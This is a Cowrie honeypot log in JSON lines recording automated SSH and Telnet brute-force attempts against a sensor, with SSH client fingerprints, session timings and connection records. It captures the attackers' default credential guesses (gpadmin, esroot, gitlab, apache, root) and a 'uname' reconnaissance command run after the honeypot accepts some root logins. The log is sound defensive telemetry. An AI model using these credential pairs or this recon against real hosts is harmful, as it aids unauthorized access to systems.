{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:19:57.754847Z","src_ip":"212.227.235.229","session":"be065c10c1c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38760,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf920b025722","protocol":"ssh","message":"New connection: 212.227.125.160:38760 (1.2.3.4:22) [session: bf920b025722]","sensor":"my-vps","timestamp":"2025-08-28T05:20:04.374215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:04.402349Z","src_ip":"212.227.125.160","session":"bf920b025722"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:04.479902Z","src_ip":"212.227.125.160","session":"bf920b025722"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:20:04.922993Z","src_ip":"212.227.125.160","session":"bf920b025722"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:06.104716Z","src_ip":"212.227.125.160","session":"bf920b025722"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40166,"dst_ip":"1.2.3.4","dst_port":22,"session":"20aed392374f","protocol":"ssh","message":"New connection: 212.227.235.229:40166 (1.2.3.4:22) [session: 20aed392374f]","sensor":"my-vps","timestamp":"2025-08-28T05:20:14.640319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:14.641890Z","src_ip":"212.227.235.229","session":"20aed392374f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:14.786321Z","src_ip":"212.227.235.229","session":"20aed392374f"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:20:15.220291Z","src_ip":"212.227.235.229","session":"20aed392374f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:16.367106Z","src_ip":"212.227.235.229","session":"20aed392374f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57736,"dst_ip":"1.2.3.4","dst_port":22,"session":"abab539ce2fc","protocol":"ssh","message":"New connection: 212.227.125.160:57736 (1.2.3.4:22) [session: abab539ce2fc]","sensor":"my-vps","timestamp":"2025-08-28T05:20:19.145585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:19.242894Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:19.347034Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:20:20.006975Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:20:20.279380Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:20:20.280230Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:20.386391Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:20.387921Z","src_ip":"212.227.125.160","session":"abab539ce2fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43914,"dst_ip":"1.2.3.4","dst_port":22,"session":"092fa1bc01ba","protocol":"ssh","message":"New connection: 212.227.235.229:43914 (1.2.3.4:22) [session: 092fa1bc01ba]","sensor":"my-vps","timestamp":"2025-08-28T05:20:26.383609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:26.384487Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:26.528984Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:20:26.962916Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:20:27.335810Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:20:27.336491Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:27.481761Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:27.482810Z","src_ip":"212.227.235.229","session":"092fa1bc01ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57138,"dst_ip":"1.2.3.4","dst_port":22,"session":"5337f234a63a","protocol":"ssh","message":"New connection: 212.227.235.229:57138 (1.2.3.4:22) [session: 5337f234a63a]","sensor":"my-vps","timestamp":"2025-08-28T05:20:40.675420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:40.676272Z","src_ip":"212.227.235.229","session":"5337f234a63a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:40.824110Z","src_ip":"212.227.235.229","session":"5337f234a63a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41744,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed71e6029f4","protocol":"ssh","message":"New connection: 212.227.125.160:41744 (1.2.3.4:22) [session: aed71e6029f4]","sensor":"my-vps","timestamp":"2025-08-28T05:20:40.880398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:40.885576Z","src_ip":"212.227.125.160","session":"aed71e6029f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:40.989662Z","src_ip":"212.227.125.160","session":"aed71e6029f4"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-28T05:20:41.260202Z","src_ip":"212.227.235.229","session":"5337f234a63a"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-28T05:20:41.409159Z","src_ip":"212.227.125.160","session":"aed71e6029f4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:42.405600Z","src_ip":"212.227.235.229","session":"5337f234a63a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:42.515340Z","src_ip":"212.227.125.160","session":"aed71e6029f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35490,"dst_ip":"1.2.3.4","dst_port":22,"session":"0683bf5be60e","protocol":"ssh","message":"New connection: 212.227.125.160:35490 (1.2.3.4:22) [session: 0683bf5be60e]","sensor":"my-vps","timestamp":"2025-08-28T05:20:48.155910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:48.216540Z","src_ip":"212.227.125.160","session":"0683bf5be60e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:48.352425Z","src_ip":"212.227.125.160","session":"0683bf5be60e"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-28T05:20:48.727592Z","src_ip":"212.227.125.160","session":"0683bf5be60e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:49.926760Z","src_ip":"212.227.125.160","session":"0683bf5be60e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51736,"dst_ip":"1.2.3.4","dst_port":22,"session":"a33827bb7a9d","protocol":"ssh","message":"New connection: 212.227.235.229:51736 (1.2.3.4:22) [session: a33827bb7a9d]","sensor":"my-vps","timestamp":"2025-08-28T05:20:55.013453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:20:55.014316Z","src_ip":"212.227.235.229","session":"a33827bb7a9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:20:55.159421Z","src_ip":"212.227.235.229","session":"a33827bb7a9d"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-28T05:20:55.673650Z","src_ip":"212.227.235.229","session":"a33827bb7a9d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:20:56.821232Z","src_ip":"212.227.235.229","session":"a33827bb7a9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54272,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec25cfa0c90d","protocol":"ssh","message":"New connection: 212.227.125.160:54272 (1.2.3.4:22) [session: ec25cfa0c90d]","sensor":"my-vps","timestamp":"2025-08-28T05:21:02.406028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:21:02.486132Z","src_ip":"212.227.125.160","session":"ec25cfa0c90d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:21:02.575051Z","src_ip":"212.227.125.160","session":"ec25cfa0c90d"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:21:02.996125Z","src_ip":"212.227.125.160","session":"ec25cfa0c90d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:04.101839Z","src_ip":"212.227.125.160","session":"ec25cfa0c90d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33522,"dst_ip":"1.2.3.4","dst_port":23,"session":"561efb8bc9c4","protocol":"telnet","message":"New connection: 212.227.125.160:33522 (1.2.3.4:23) [session: 561efb8bc9c4]","sensor":"my-vps","timestamp":"2025-08-28T05:21:08.243107Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49604,"dst_ip":"1.2.3.4","dst_port":22,"session":"a76d66a22394","protocol":"ssh","message":"New connection: 212.227.235.229:49604 (1.2.3.4:22) [session: a76d66a22394]","sensor":"my-vps","timestamp":"2025-08-28T05:21:10.352112Z"}
